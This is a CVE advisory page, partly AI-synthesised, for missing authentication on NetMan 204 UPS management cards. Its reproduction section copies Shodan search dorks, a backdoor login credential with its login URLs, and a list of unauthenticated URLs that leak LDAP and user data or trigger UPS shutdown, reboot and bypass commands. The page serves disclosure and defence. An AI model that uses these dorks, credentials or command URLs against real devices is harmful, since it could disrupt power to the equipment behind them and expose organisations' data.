CVE-2025-71318
Description
NetMan 204's administrative pages and command endpoints lack authentication, allowing unauthenticated attackers to access sensitive info and control UPS functions.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
NetMan 204's administrative pages and command endpoints lack authentication, allowing unauthenticated attackers to access sensitive info and control UPS functions.
Vulnerability
NetMan 204 fails to enforce authentication on its administrative pages and command endpoints. This vulnerability affects all versions of NetMan 204. A remote, unauthenticated attacker can directly access administrative pages and command endpoints without providing any credentials [3].
Exploitation
An attacker can discover vulnerable NetMan 204 instances using search engines like Shodan [2]. The attacker can then directly access administrative pages such as administration.html, administration-commands.html, and configuration.html by crafting specific URLs. For the 'blue panel' variant, no credentials are required to access these pages and execute commands [2].
Impact
Successful exploitation allows a remote, unauthenticated attacker to disclose sensitive information, including LDAP configuration and active user details. Additionally, attackers can invoke privileged UPS control commands, such as shutdown, reboot, switch-on-bypass, and battery test, without authentication [3].
Mitigation
No patched version or specific mitigation details are currently available in the provided references. Users are advised to consult the vendor for further information regarding security updates or workarounds [1, 2, 3].
AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The system fails to enforce authentication on administrative pages and command endpoints."
Attack vector
A remote, unauthenticated attacker can directly access administrative pages and command endpoints without providing any credentials. By requesting URLs such as administration.html, administration-commands.html, and configuration.html, an attacker can disclose sensitive information like LDAP configuration and active user details [ref_id=1]. Furthermore, privileged UPS control commands, including shutdown and reboot, can be invoked [ref_id=1].
Affected code
The vulnerability affects NetMan 204's administrative pages and command endpoints, including but not limited to administration.html, administration-commands.html, and configuration.html [ref_id=1]. Specific URLs that can be accessed without authentication are listed in the reference write-up [ref_id=1].
What the fix does
The advisory does not specify any patches or provide details on how the vulnerability is fixed. It is recommended to consult the vendor for remediation guidance.
Preconditions
- networkThe attacker must have network access to the target system.
- authNo authentication is required to exploit this vulnerability.
Reproduction
Step 1 : Attacker can using these dorks then can find the UPS panel . Shodan : http.favicon.hash:22913038 OR https://www.shodan.io/search?query=netman+204+cgi-bin
We Found Two panel Yellow and blue
Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands and burpsuite repeater to see the details of the ups . Yellow Panel : username and password : eurek Some exploits for that : http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek or https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek Due to flaws in parameter validation, the URL can be shortened to: http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek or https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
Blue Panel : username and password : admin Some Critical leaks without authentication we can see : http://IP/administration-commands.html http://IP/administration.html http://IP/administration.html# http://IP/administration.html#LDAP http://IP/administration.html#active-users http://IP/administration.html#firmware-upgrade http://IP/configuration.html http://IP/history.html http://IP/index.html http://IP/login.html http://IP/system-overview.html http://IP/table.html
With using up paths we can see the details of the UPS without authentication . First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :)
Some Remote commands without authentication : http://IP/administration-commands.html http://IP/administration-commands.html# http://IP/administration-commands.html#reboot-irms http://IP/administration-commands.html#reboot-mdu http://IP/administration-commands.html#reboot-xts http://IP/administration-commands.html#shutdown http://IP/administration-commands.html#shutdown-irms http://IP/administration-commands.html#shutdown-mdu http://IP/administration-commands.html#shutdown-restore http://IP/administration-commands.html#shutdown-restore-irms http://IP/administration-commands.html#shutdown-restore-mdu http://IP/administration-commands.html#shutdown-restore-xts http://IP/administration-commands.html#shutdown-xts http://IP/administration-commands.html#shutdownrestore http://IP/administration-commands.html#switch-irms http://IP/administration-commands.html#switch-on-bypass http://IP/administration-commands.html#test-battery [ref_id=1]
Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3News mentions
0No linked articles in our index yet.